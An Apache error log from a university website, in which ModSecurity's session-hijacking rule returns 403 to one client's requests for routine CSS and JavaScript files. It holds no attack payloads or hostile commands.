[Mon Aug 28 07:47:00.294409 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOvuhMCo-f0AAJS0EhwAAAAW"]
[Mon Aug 28 07:47:00.296623 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOvuhMCo-f0AAJS1nEYAAAAX"]
[Mon Aug 28 07:47:00.312215 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOvuhMCo-f0AAJS2FXQAAAAY"]
[Mon Aug 28 07:47:00.343084 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOvuhMCo-f0AAJS3EXwAAAAZ"]
[Mon Aug 28 07:47:00.351828 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvuhMCo-f0AAJS0Eh0AAAAW"]
[Mon Aug 28 07:47:00.355065 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvuhMCo-f0AAJSyp1kAAAAM"]
[Mon Aug 28 07:47:00.363609 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvuhMCo-f0AAJS2FXUAAAAY"]
[Mon Aug 28 07:47:00.393744 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvuhMCo-f0AAJS1nEcAAAAX"]
[Mon Aug 28 07:47:00.398398 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvuhMCo-f0AAJS3EX0AAAAZ"]
[Mon Aug 28 07:47:00.409106 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvuhMCo-f0AAJS0Eh4AAAAW"]
[Mon Aug 28 07:47:00.411226 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvuhMCo-f0AAJS2FXYAAAAY"]
[Mon Aug 28 07:47:00.442429 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvuhMCo-f0AAJSyp1oAAAAM"]
[Mon Aug 28 07:47:00.442533 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvuhMCo-f0AAJS1nEgAAAAX"]
[Mon Aug 28 07:47:00.459386 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvuhMCo-f0AAJS2FXcAAAAY"]
[Mon Aug 28 07:47:00.460407 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvuhMCo-f0AAJS3EX4AAAAZ"]
[Mon Aug 28 07:47:00.477391 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvuhMCo-f0AAJS1nEkAAAAX"]
[Mon Aug 28 07:47:00.477759 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvuhMCo-f0AAJSyp1sAAAAM"]
[Mon Aug 28 07:47:00.508493 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvuhMCo-f0AAJS0Eh8AAAAW"]
[Mon Aug 28 07:47:00.531450 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvuhMCo-f0AAJS3EX8AAAAZ"]
[Mon Aug 28 07:47:00.554938 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvuhMCo-f0AAJS1nEoAAAAX"]
[Mon Aug 28 07:47:00.558329 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOvuhMCo-f0AAJSyp1wAAAAM"]
[Mon Aug 28 07:47:00.562920 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOvuhMCo-f0AAJS0EiAAAAAW"]
[Mon Aug 28 07:47:00.563440 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOvuhMCo-f0AAJS2FXgAAAAY"]
[Mon Aug 28 07:47:00.581356 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOvuhMCo-f0AAJS3EYAAAAAZ"]
[Mon Aug 28 07:47:00.586797 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOvuhMCo-f0AAJS1nEsAAAAX"]
[Mon Aug 28 07:47:00.597072 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOvuhMCo-f0AAJS0EiEAAAAW"]
[Mon Aug 28 07:47:00.597388 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOvuhMCo-f0AAJS2FXkAAAAY"]
[Mon Aug 28 07:47:00.604998 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvuhMCo-f0AAJS3EYEAAAAZ"]
[Mon Aug 28 07:47:00.614762 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvuhMCo-f0AAJSyp10AAAAM"]
[Mon Aug 28 07:47:00.631893 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvuhMCo-f0AAJS1nEwAAAAX"]
[Mon Aug 28 07:47:00.632045 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvuhMCo-f0AAJS0EiIAAAAW"]
[Mon Aug 28 07:47:00.642990 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvuhMCo-f0AAJSyp14AAAAM"]
[Mon Aug 28 07:47:00.646566 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOvuhMCo-f0AAJS3EYIAAAAZ"]
[Mon Aug 28 07:47:00.671382 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOvuhMCo-f0AAJSxYhoAAAAH"]
[Mon Aug 28 07:47:00.673161 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvuhMCo-f0AAJS2FXoAAAAY"]
[Mon Aug 28 07:47:00.684331 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvuhMCo-f0AAJS1nE0AAAAX"]
[Mon Aug 28 07:47:00.687796 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOvuhMCo-f0AAJS3EYMAAAAZ"]
[Mon Aug 28 07:47:00.703862 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOvuhMCo-f0AAJSxYhsAAAAH"]
[Mon Aug 28 07:47:00.708668 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvuhMCo-f0AAJS1nE4AAAAX"]
[Mon Aug 28 07:47:00.756974 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvuhMCo-f0AAJSyp18AAAAM"]
[Mon Aug 28 07:47:00.758044 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvuhMCo-f0AAJSxYhwAAAAH"]
[Mon Aug 28 07:47:00.774211 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOvuhMCo-f0AAJS2FXsAAAAY"]
[Mon Aug 28 07:47:00.775790 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOvuhMCo-f0AAJSyp2AAAAAM"]
[Mon Aug 28 07:47:00.788896 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOvuhMCo-f0AAJSxYh0AAAAH"]
[Mon Aug 28 07:47:00.789320 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOvuhMCo-f0AAJS1nE8AAAAX"]
[Mon Aug 28 07:47:00.815304 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOvuhMCo-f0AAJS2FXwAAAAY"]
[Mon Aug 28 07:47:00.817729 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOvuhMCo-f0AAJSxYh4AAAAH"]
[Mon Aug 28 07:47:00.820773 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvuhMCo-f0AAJSyp2EAAAAM"]
[Mon Aug 28 07:47:00.820895 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOvuhMCo-f0AAJS1nFAAAAAX"]
[Mon Aug 28 07:47:00.840693 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOvuhMCo-f0AAJS3EYQAAAAZ"]
[Mon Aug 28 07:47:00.858146 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvuhMCo-f0AAJS1nFEAAAAX"]
[Mon Aug 28 07:47:00.883459 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvuhMCo-f0AAJS2FX0AAAAY"]
[Mon Aug 28 07:47:00.907878 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvuhMCo-f0AAJS1nFIAAAAX"]
[Mon Aug 28 07:47:00.944455 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvuhMCo-f0AAJSxYh8AAAAH"]
[Mon Aug 28 07:47:00.973258 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvuhMCo-f0AAJS1nFMAAAAX"]
[Mon Aug 28 07:47:01.002915 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvuhcCo-f0AAJS3EYUAAAAZ"]
[Mon Aug 28 07:47:01.027895 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvuhcCo-f0AAJSxYiAAAAAH"]
[Mon Aug 28 07:47:01.053167 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvuhcCo-f0AAJSyp2IAAAAM"]
[Mon Aug 28 07:47:01.092493 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvuhcCo-f0AAJS1nFQAAAAX"]
[Mon Aug 28 07:47:01.118737 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvuhcCo-f0AAJSyp2MAAAAM"]
[Mon Aug 28 07:47:01.143028 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvuhcCo-f0AAJS1nFUAAAAX"]
